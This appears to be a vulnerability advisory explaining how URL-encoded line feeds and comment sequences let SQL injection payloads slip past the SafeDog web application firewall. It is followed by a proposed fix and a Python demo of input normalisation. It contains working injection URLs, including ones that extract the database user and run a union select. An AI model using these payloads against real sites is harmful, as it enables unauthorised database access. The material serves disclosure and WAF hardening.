SafeDog (安全狗) SQL Injection Protection Policy Bypass Vulnerability
SafeDog bypass vulnerability: the injection filter can be bypassed with a single character. In a few special cases that character has to be combined with a comment sequence.
The core character used for the bypass is %0A (a URL-encoded line feed). The database's SQL parser treats it as ordinary whitespace, but the keyword rules do not, so the rules never see the keyword they are looking for; only in some special cases does it need to be combined with a comment sequence.
%0A is just one idea. Variations on it include stacking several %0A characters, or mixing %0A with comment sequences such as -- and /**/.
1. A V5shop instance containing the injection point was installed on a local machine (IIS 6 + ASPX + MSSQL 2005) to test the IIS version of SafeDog. A normal injection test looks like this:
http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user
AND is recognised as a keyword and the request is intercepted.
2. Add %0A in front of AND and try again:
http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user
The request gets through and the injection works.
In an Apache + PHP + MySQL environment:
First, try the injection as usual:
http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=''
The request is intercepted, because both and and user() are keywords on the blacklist. Now add %0A and try again:
http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=''
http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())='root@localhost'
Both requests get through. The first comparison is false and the second is true, so the two pages differ and the database user is confirmed as root@localhost.
Of course, %0A is only one idea. The variations are stacking several %0A characters or mixing %0A with comment sequences. For example, a -- comment terminated by %0A (MySQL treats -- followed by a line feed as an empty end-of-line comment, so the server still sees union select):
http://192.168.91.152:8000/About.php?did=-2%0Aunion--%0Aselect%0Auser()
Solution:
Filter %0A: URL-decode the request and normalise line feeds and other control characters to a plain space (and strip comment sequences) before the keyword rules run, so that the WAF sees the same token boundaries the database does.
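As an added example that is not part of the original write-up, the following Python models the kind of blacklist rule this trick defeats, runs it over the query strings from the tests above, and then shows the normalisation step that closes the hole. The naive rule is an assumed reconstruction for illustration (SafeDog's real signatures are not given on this page), and the extra inputs with %09, %0B, %0C and %0D are constructed to show that the idea generalises to every control character the SQL parser accepts as whitespace, not only %0A.

```python
import re
from urllib.parse import unquote_plus

# Query strings from the write-up above, plus constructed variants that swap
# %0A for other control characters the database also treats as whitespace.
BENIGN = "act=buy&id=12"
BLOCKED_AND = "act=buy&id=1 AND 1=user"
BYPASS_AND = "act=buy&id=1%0AAND 1=user"
BLOCKED_SELECT = "did=2 and/**/(select user())=''"
BYPASS_SELECT = "did=2%0Aand/**/(select%0Auser())=''"
BYPASS_UNION = "did=-2%0Aunion--%0Aselect%0Auser()"
BYPASS_TAB = "act=buy&id=1%09AND 1=user"          # constructed: horizontal tab
BYPASS_STACKED = "act=buy&id=1%0A%0D%0B%0CAND%0A1=user"  # constructed: several control chars

KEYWORDS = r"(?:and|or|union|select|user)"

# Assumed model of a blacklist that only recognises a keyword when it follows a
# separator seen in "textbook" injections: a space or an inline /**/ comment.
# A line feed is neither, so %0A slips past.  Illustrative only, not SafeDog's
# actual rule set.
NAIVE_RULE = re.compile(rf"(?: |/\*.*?\*/){KEYWORDS}\b", re.I | re.S)


def naive_waf_blocks(query: str) -> bool:
    """True if the naive keyword rule intercepts the decoded query string."""
    return NAIVE_RULE.search(unquote_plus(query)) is not None


def normalize(query: str) -> str:
    """Canonicalise the request the way the SQL parser will see it: decode,
    drop comments, and collapse every control/whitespace byte (line feed,
    carriage return, tab, vertical tab, form feed, space) to a single space."""
    s = unquote_plus(query)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # /**/ inline comments
    s = re.sub(r"(?:--|#)[^\r\n]*", " ", s)        # -- and # comments run to end of line
    s = re.sub(r"[\x00-\x20]+", " ", s)            # any run of control chars/whitespace -> one space
    return s


# Same keyword list, but applied to the normalised text with word boundaries,
# so the choice of whitespace character no longer matters.
HARDENED_RULE = re.compile(rf"\b{KEYWORDS}\b", re.I)


def hardened_waf_blocks(query: str) -> bool:
    """True if the keyword rule intercepts the query after normalisation."""
    return HARDENED_RULE.search(normalize(query)) is not None


if __name__ == "__main__":
    cases = [
        ("benign", BENIGN),
        ("blocked AND", BLOCKED_AND),
        ("bypass AND", BYPASS_AND),
        ("blocked select", BLOCKED_SELECT),
        ("bypass select", BYPASS_SELECT),
        ("bypass union", BYPASS_UNION),
        ("bypass tab", BYPASS_TAB),
        ("bypass stacked", BYPASS_STACKED),
    ]
    for name, q in cases:
        print(f"{name:15} naive={naive_waf_blocks(q)!s:5} "
              f"hardened={hardened_waf_blocks(q)!s:5} sees={normalize(q)!r}")
```

The naive matcher fails because it reasons about the request text, while the database reasons about tokens; every payload on this page only changes the text between tokens. Normalising first means the rule is evaluated on the token stream the server will actually execute, which is why stacking more %0A characters or switching to %09 does not help the attacker against the hardened version.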